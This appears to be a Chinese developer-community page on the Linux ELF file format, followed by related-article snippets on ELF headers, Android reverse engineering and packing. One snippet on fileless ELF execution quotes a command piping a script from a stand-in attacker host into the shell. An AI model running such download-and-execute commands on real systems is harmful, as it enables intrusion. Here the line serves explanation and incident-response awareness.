开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

linux elf 文件格式

ELF（Executable and Linkable Format）文件格式是Linux操作系统中用于存储可执行文件、动态链接库和核心转储文件的标准二进制文件格式。它由UNIX系统实验室（USL）开发，作为应用程序二进制接口（ABI）的一部分，广泛应用于Linux和其他类Unix系统。ELF文件格式的设计使其具有良好的可移植性，能够在不同的操作系统和硬件平台上运行，同时支持动态链接和共享库，增强了程序的灵活性和效率。

ELF文件的基础概念

ELF文件类型：
- 可重定位文件：包含代码和数据，可用于链接成可执行文件或共享目标文件。
- 可执行文件：包含可直接执行的程序。
- 共享目标文件：包含代码和数据，可在链接阶段与其他文件链接，或在运行时动态链接。
- 核心转储文件：进程意外终止时保存进程内容和状态信息，用于调试分析。

ELF文件的优势

可移植性：ELF文件格式包含足够的平台相关信息，支持不同平台上的交叉编译和交叉链接。
动态链接：支持在运行时动态加载和链接库文件，提高程序的灵活性和效率。
强大的工具支持：GNU工具链对ELF文件格式提供了广泛的支持，使得处理ELF文件非常方便。

ELF文件的应用场景

ELF文件格式广泛应用于Linux系统中的各种应用程序，包括桌面应用程序、命令行工具和服务器端服务。它也是Linux内核的一部分，用于处理ELF文件，确保程序能够正确加载和执行。

ELF文件的处理工具

readelf：查看ELF文件信息。
objdump：反汇编ELF文件内容。
nm：查看ELF文件中的符号信息。
ldd：查看可执行程序或动态库依赖的动态库。
strip：删除ELF文件中的符号信息和调试信息，减小文件大小。

通过上述信息，我们可以看到ELF文件格式不仅在技术上具有重要的作用，而且在实际应用中也发挥着不可或缺的功能。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

ELF文件格式

文章目录源码到可执行文件 ELF文件格式 ELF File header Program header Section header 工具 Symbol Table 源码到可执行文件 linux中四类文件使用...ELF文件格式 normal executable files relocatable object files core files shared objects....https://man7.org/linux/man-pages/man5/elf.5.html 1999年86open项目选择ELF作为x86处理器上Unix和类Unix系统的标准二进制文件格式。...例如这些扩展名的文件一般都是elf格式：.axf, .bin, .elf, .o, .prx, .puff, .ko, .so, and .mod ELF文件格式引用wiki的一张图： https...implementation is provided by GNU Binutils. elfutils provides alternative tools to GNU Binutils purely for Linux

1.6K3 0

ELF文件格式简介

1 简介可执行与可链接格式（Executable and Linkable Format，ELF），常被称为 ELF格式，是一种用于可执行文件、目标代码、共享库和核心转储（core dump）的标准文件格式...，一般用于类Unix系统，比如Linux，Macox等。...比如linux下的.so文件。 2 ELF文件格式在编译过程中ELF文件格式在链接和程序的运行阶段的格式不同。...2.1 ELF Header ELF文件头描述了ELF文件的基本类型，地址偏移等信息，分为32bit和64bit两个版本，定义于linux源码的/usr/include/elf.h文件中。...)Specification Version 1.2 What’s the difference of section and segment in ELF file format ELF文件格式版权声明

2.2K3 1

ELF文件格式解析

参考资料 ELF文件格式解析《Android软件安全权威指南》8.4-原生程序文件格式 Android平台感染ELF文件实现模块注入 elf文件类型六 Dynamic Section（动态section...）简单粗暴的so加解密实现上边的资料对ELF文件格式的分析非常详细，这边主要记录一下自己感觉比较重要和掌握的不是很清楚的部分，增加一些自己的理解，也方便后续查阅。...：程序节区，ELF文件的主要内容存放与此 Section Header Table：节区头表，包含多个Section Header 如图展示了ELF文件四个部分的空间上的组成，同时展示了ELF的两个视图...所以综上所述，整个SO文件的大小= e_shoff + e_shnum * sizeof(e_shentsize) + 1 有兴趣可以参考这篇文章来了解更多：ELF文件格式解析，下面很多部分都借鉴了这篇文章的内容...ELF加载经过测试，ELF文件被加载时会每个LOAD段的记录将文件进行加载，具体来说，就是将ELF文件从LOAD段的p_offset位置读取p_filesz大小的数据，映射到内存中ELF基址+p_vaddr

2.6K4 0

ELF文件格式的详解

ELF文件格式的详解 1.说明 2.elf文件的基本格式 3.elf文件的头部信息 4.elf文件的节区（Section） 4.1 节区的作用 4.2 节区的组成 5.elf文件的段(Segment)...Binary Interface)接口的一部分，也是Linux的主要可执行文件格式。...本文主要从elf文件的组成构造的角度来进行分析，将elf文件的解析通过一步一步的分析得到里面的信息，同时通过python脚本解析，可以直观的看到文件的信息，通过本文的阅读，将对elf文件格式有着更加深刻的理解...具体的elf文件加载过程这篇文章不会多说，后面会写文章专门叙述。本文的目的是elf文件格式的解析过程。...本文主要通过对elf文件的构造、具体的含义以及如何去分析elf文件的角度，全面的进行elf文件格式的剖析。在程序链接、程序加载执行上会有更多不一样的理解。

6.5K5 4

ELF文件格式修复

新的疑问随之而来：如前面所述，我在构造畸形ELF文件的时候，直接把section头部表给删除了，还修改了ELF头部和section相关的字段，为啥不会影响执行呢？...d_un; } Elf32_Dyn; typedef struct { Elf64_Xword d_tag; union { Elf64...Elf32_Dyn数组 Elf32_Dyn中的d_tag非常重要，它标示了各种数据类型，其后的d_un也是根据d_tag进行解释的。...到目前为止，我发现对文件格式解析最强大的，当属010Editor（假如有比这个好的，请告知我一下，非常感谢）。...网上可以下载到解析ELF文件的Template，但这个Template对于畸形ELF不做深入解析，为此，我花了1天时间学习了010Editor的语法，发现它的模板真的是非常强大。

2.4K6 1

【Android 逆向】ELF 文件格式 ( ELF 文件简介 | ELF 文件结构 )

文章目录一、ELF 文件简介二、ELF 文件结构一、ELF 文件简介 ---- ELF 文件是 Executable and Linkable Format ( 可执行和可链接格式 ) 的文件...| 编译器指示字 ) 博客 ; ELF 文件对应的 Linux 中的目标文件格式有 : 库文件 , 可执行文件 , 编译中间文件 ; 编译中间文件有 .a , .o , .s 文件 ; 库文件 ,..., 会遵循 ELF 文件格式的规范 ; ELF 文件格式最常见的形式就是 .so 动态库 ; ELF 文件的特点 : ELF 文件是以 7F 45 4C 46 开头 , 其中 7F 是一个二进制标志..., 45 4C 46 是 ELF 字符对应的 ASCII 码 ; 二、ELF 文件结构 ---- ELF 文件由以下四部分组成 : ELF 文件头 ELF 程序头 : ELF 程序头会告知节区头部表的位置...; 节区或段节区头部表 : 节区头部表会告知 ELF 文件中有多少个节区 , 一般节区头部表一般都在 ELF 文件尾部 ;

1.3K3 0

【Android 逆向】ELF 文件格式总结 ★★★

文章目录一、ELF 文件当前版本号二、操作系统 ABI 信息三、ABI 版本四、文件头校验五、文件头长度信息六、ELF 文件类型 ( 动态库文件 ) 七、ELF 文件对应 CPU 架构八、...ELF 目标文件版本九、可执行程序起始地址十、程序头偏移量十一、节区头偏移量十二、处理器特定标志十三、ELF 文件头大小十四、ELF 程序头入口大小十五、ELF 程序头入口个数十六、ELF...文件节区头入口大小十七、ELF 文件节区头入口个数十八、字符表序号一、ELF 文件当前版本号 ---- ELF 文件头第 6 字节 : 版本信息 ; 二、操作系统 ABI 信息 ---- ELF...; 六、ELF 文件类型 ( 动态库文件 ) ---- ELF 文件头第 16 ~ 17 字节 : ELF 文件类型 , 动态库文件 / 可执行文件 / 静态库文件 / 链接文件 ; 03 00...表示该 ELF 文件是动态库文件 ; 03 00 小端格式 , 低位在低地址 , 值为 3 ; 七、ELF 文件对应 CPU 架构 ---- ELF 文件头第 18 ~ 19 字节 : ELF 文件对应的

5831 1

链接加载原理及ELF文件格式

在linux环境下，链接和加载的机制最终有一个载体来承担，这个载体就是elf文件。所以从研究elf文件格式入手，是理解链接和加载原理的好方法。...elf文件相关背景 Elf文件格式，是现有linux环境下最流行的可执行文件格式，在elf文件存储的信息之上，实现了相应的链接和加载特性。...Linux环境下可执行文件格式的发展历史是：a.out -> coff -> xcoff -> elf。...elf文件格式 Linux环境下，三种类型的执行文件都可以使用elf格式来表示：可重定位文件（即编译生成但是未连接的文件）、动态库文件、可执行文件。...Elf文件的原理已经在上一章中阐述，elf的具体文件格式详细描述可以参考参考资料中的“Executable and Linking Format (ELF) Specification “。

1.2K2 0

【Android 逆向】ELF 文件格式 ( ELF 文件头 | ELF 文件头标志 | ELF 文件位数 | ELF 文件大小端格式 )

文章目录一、ELF 文件简介二、ELF 文件头三、ELF 文件头标志四、ELF 文件位数五、ELF 文件大小端格式一、ELF 文件简介 ---- 在上一篇博客【Android 逆向】ELF...文件格式 ( 安装 010 Editor 二进制查看工具的 ELF.bt 插件模板 | 安装 ELF.bt 模板 | 打开 ELF 文件 ) 中 , 准备 ELF 文件解析环境 , 在 010 Editor...中安装了 ELF.bt 模板 ; 二、ELF 文件头 ---- ELF 文件头区域如下 : 前 16 字节是 ELF 的标志 , 三、ELF 文件头标志 ---- 0 ~ 3 字节 : 是 0x7F...和 ELF 的 ASCII 码 ; 这是 ELF 文件的特征 ; 四、ELF 文件位数 ---- 4 字节 : 表示该 ELF 文件的位数 32 位还是 64 位 ; 值为 01 , 表示该 ELF...文件是 32 位文件 ; 五、ELF 文件大小端格式 ---- 5 字节 : 表示有效位格式 , 取值 LSB / MSB ; 此处值为 1 , LSB 格式 ; 这个值由编译器决定 ; 有些

1.1K1 0

【Android 逆向】ELF 文件格式 ( 安装 010 Editor 二进制查看工具的 ELF.bt 插件模板 | 安装 ELF.bt 模板 | 打开 ELF 文件 )

文章目录一、搜索并下载 ELF.bt 模板二、安装 ELF.bt 模板三、打开 ELF 文件一、搜索并下载 ELF.bt 模板 ---- 进入 010 Editor 工具的插件模板下载页面 http.../010editor/repository/files/ELF.bt ; 可以在浏览器下载中 , 新建下载项 , 下载该 ELF.bt 文件 ; EXE.bt : 文件地址 https://www.sweetscape.com.../010editor/repository/files/DEX.bt 可以在浏览器下载中 , 新建下载项 , 下载该 ELF.bt 文件 ; 二、安装 ELF.bt 模板 ---- 选择 " 菜单栏.../ 模板 / 编辑模板列表 " 选项 , 在弹出的对话框中 , 新建一个模板 , 并指定模板对应文件 ; 三、打开 ELF 文件 ---- 选择打开 ELF 文件 : 打开文件后 , 选择 "...菜单栏 / 模板 / ELF 模板 " 选项 , 此时就可以在模板结果面板 , 看到 ELF 文件的四个组成部分 ;

1.9K1 0

Linux ELF笔记

ELF头部的结构体为 elf32_hdr 或 elf64_hdr，在Android系统源代码的 /bionic/libc/kernel/uapi/linux/elf.h 可以找到。...EI_VERSION Offset: 6 Length: 1 Type: Number (unsigned char) 顾名思义，是 ELF 文件格式的版本号，默认是 EV_CURRENT（= 1）。...ET_EXEC 指的是可执行程序，存在程序入口，有 Program Header，可以加载到内存中运行，在 Linux 下的可执行程序都是这样的。 ET_DYN 特指动态链接库。...e_version Offset: 0x14 Length: 4 Type: unsigned int 顾名思义，是 ELF 文件格式的版本号，默认是 EV_CURRENT（= 1）。...作者的话个人喜欢计算机技术，主要涉及的领域包括：Android系统，Linux内核，嵌入式软/硬件，机器人和智能硬件。同时也对其他的各个技术栈都感兴趣。

2.1K1 0

【Android 逆向】ELF 文件格式 ( ELF 文件类型 | ELF 文件对应 CPU 架构 | ELF 目标文件版本 | 可执行程序起始地址 )

文章目录一、ELF 文件类型 ( 动态库文件 ) 二、ELF 文件对应 CPU 架构三、ELF 目标文件版本四、可执行程序起始地址一、ELF 文件类型 ( 动态库文件 ) ---- ELF 文件头...第 16 ~ 17 字节 : ELF 文件类型 , 动态库文件 / 可执行文件 / 静态库文件 / 链接文件 ; 03 00 表示该 ELF 文件是动态库文件 ; 03 00 小端格式 , 低位在低地址..., 值为 3 ; 二、ELF 文件对应 CPU 架构 ---- ELF 文件头第 18 ~ 19 字节 : ELF 文件对应的 CPU 架构体系 , x86 / arm / mips ; 03 00...表示该 ELF 文件对应的 CPU 架构师 x86 架构 ; 03 00 小端格式 , 低位在低地址 , 值为 3 ; 三、ELF 目标文件版本 ---- ELF 文件头第 20 ~ 23 字节...: 目标文件版本 ; 默认值 1 ; 01 00 00 00 小端格式 , 低位在低地址 , 值为 1 ; 四、可执行程序起始地址 ---- ELF 文件头第 24 ~ 27 字节 : 如果 ELF

7622 0

BIN、HEX、AXF、ELF文件格式有什么区别

数据量比较从存储数据的信息量上看：ELF>AXF>HEX>BIN，所以这也就确定了只能将大信息量的文件格式向小信息量的文件格式转换，如只能将HEX文件转换为BIN文件，当然如果指定了下载地址，也可以将...ELF文件是由GCC编译器生成的。elf文件可以直接转换为hex和bin，但hex和bin 例如Linux系统下使用gcc指令gcc -o test test.c生成的elf文件，可以通过.

2.2K2 0

【Android 逆向】ELF 文件格式 ( ELF 程序头入口大小 | ELF 程序头入口个数 | ELF 文件节区头入口大小 | ELF 文件节区头入口个数 | 字符表序号 )

文章目录一、ELF 程序头入口大小二、ELF 程序头入口个数三、ELF 文件节区头入口大小四、ELF 文件节区头入口个数五、字符表序号一、ELF 程序头入口大小 ---- ELF 文件头第...32 字节 ; 二、ELF 程序头入口个数 ---- ELF 文件头第 44 ~ 45 字节 : ELF 程序头入口个数 ; 这里是 7 个 ; 07 00 小端格式 , 低位在低地址 , 值为...7 ; 如下图所示 , 程序头是由 7 个入口组成 , 每个入口大小是 32 字节 ; 三、ELF 文件节区头入口大小 ---- ELF 文件头第 46 ~ 47 字节 : ELF 文件节区头入口大小字节数...文件节区头入口个数 ---- ELF 文件头第 48 ~ 49 字节 : ELF 文件节区头入口个数 ; 这里是 21 个 ; 15 00 小端格式 , 低位在低地址 , 值为 21 ; 下图选中的部分..., 就是一个节区头入口的大小 , 有 21 个节区头入口 , 每个节区头入口大小 40 字节 ; 五、字符表序号 ---- ELF 文件头第 50 ~ 51 字节 : ELF 文件字符表序号 ;

1K2 0

Android逆向之旅—SO(ELF)文件格式详解–反编译so

今天我们先来介绍一下elf文件的格式，因为我们知道Android中的so文件就是elf文件，所以需要了解so文件，必须先来了解一下elf文件的格式，对于如何详细了解一个elf文件，就是手动的写一个工具类来解析一个...第二、准备资料我们需要了解elf文件的格式，关于elf文件格式详解，网上已经有很多介绍资料了。这里我也不做太多的解释了。不过有两个资料还是需要介绍一下的，因为网上的内容真的很多，很杂。...就是很出名的：readelf命令不过Window下这个命令不能用，因为这个命令是Linux的，所以我们还得做个工作就是安装Cygwin。...还有很多命令用法，这里就不在细说了，网上有很多介绍的~~ 第四、实际操作解析Elf文件(Java代码&C++代码) 上面我们介绍了elf文件格式资料，elf文件的工具，那么下面我们就来实际操作一下，来用...，可以很深刻的了解elf文件的格式，所以我们在以后遇到一个文件格式的了解过程中，最好的方式就是手动的写一个工具类就好了。

26.8K19 16

Linux 文件格式fastafastqgffgtf

fasta pic1 图片 fastq pic2 图片 gff pic3，4 图片图片 gtf pic5，6 图片图片按列隔开 column -t | l...

4.5K0 0

Linux无文件渗透执行ELF

01 简介在进行Linux系统的攻击应急时，大家可能会查看pid以及/proc相关信息，比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令，通过/proc/$pid/...exe抓样本等，但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢？...02 技术核心这里向大家介绍一个linux系统的底层调用函数memfd_create(2)，它在内核3.17中引入，会创建一个匿名文件并返回一个文件描述符指向它，该文件表现和常规文件类同，可以进行修改...这里还有一个问题，如何将elf二进制文件写入到创建的文件当中，@MagisterQuis这里使用open函数将$FH内容添加进创建的匿名文件$fd当中，而$FH通过perl转化自要执行的elf文件，这就是该脚本的第二部分...参考： https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html http://man7.org/linux

5.6K8 0

ARM Linux ELF加壳方案

后来又出现了「自定义 Linker」等方式的保护方式，这样可以隐藏一些文件格式信息，但依旧解决不了函数被Dump后的反编译问题。...支持工具推荐支持ARM 虚拟化保护方案的工具：Virbox Protector 开发环境支持 Windows、Linux、macOS。

5.6K3 0

详解ELF可执行文件格式：读取头部信息和程序表头

这一节我们先掌握如何读取头部信息和程序表头，我们先看ELF文件的大致结构： ? ELF文件格式最重要的就是所谓的段，特别是其中的代码段和数据段。对应上图就是.text,.data两个段。...： https://man7.org/linux/man-pages/man5/elf.5.html 我们本次要解读ELF文件的两个部分，一个是其文件头。.../pan.baidu.com/s/1YbApA8J_68E1UlLHpAtc9A 密码: ao1d 对应的是代码所解读的ELF文件，以下是解读ELF头的实现: import struct elf32_path...= elf32_info[0] program_header_entry_size = elf32_info[2] program_header_entry_count = elf32...深刻掌握ELF文件结构及其加载原理是实现Linux上二进制劫持的基础，其过程很烦琐，同时又涉及到很多平常用不上的关于硬件和体系结构的知识，能否啃得下这些枯燥的知识点，决定了一个人是否有毅力和决心在技术之路上走的足够远并且最终能脱颖而出

4.3K2 0

遇到ELF: not found

Reference https://stackoverflow.com/questions/57446579/executable-says-line-1-elf-not-found-when-starts

3.8K1 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭